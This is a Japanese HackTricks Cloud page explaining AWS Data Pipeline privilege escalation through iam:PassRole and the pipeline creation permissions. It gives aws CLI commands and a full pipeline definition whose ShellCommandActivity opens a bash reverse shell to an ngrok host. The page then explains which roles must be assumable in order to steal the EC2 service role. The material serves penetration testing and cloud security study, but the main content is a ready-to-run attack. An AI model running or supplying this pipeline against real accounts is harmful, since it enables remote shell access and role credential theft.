Japanese - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - Datapipeline Privesc

Support HackTricks

datapipeline

データパイプラインに関する詳細情報は、以下を確認してください:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

これらの権限を持つユーザーは、データパイプラインを作成することで特権を昇格させることができます。これは、割り当てられたロールの権限を使用して任意のコマンドを実行するためです:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

パイプラインの作成後、攻撃者は特定のアクションやリソースの作成を指示するためにその定義を更新します:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

14行目、15行目、27行目ロールdatapipeline.amazonaws.comによって引き受け可能なロールである必要があり、28行目のロールはEC2プロファイルインスタンスを持つec2.amazonaws.comによって引き受け可能なロールである必要があります。

さらに、EC2インスタンスはEC2インスタンスによって引き受け可能なロールにのみアクセスできるため(そのロールだけを盗むことができます)。

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

The 攻撃者によって作成されたパイプライン定義ファイルには、コマンドを実行するか、AWS APIを介してリソースを作成するための指示が含まれています。これにより、Data Pipelineのロール権限を利用して、追加の特権を得る可能性があります。

潜在的な影響: 指定されたec2サービスロールへの直接的な特権昇格。

参考文献

Support HackTricks
PreviousAWS - Cognito PrivescNextAWS - Directory Services Privesc

Last updated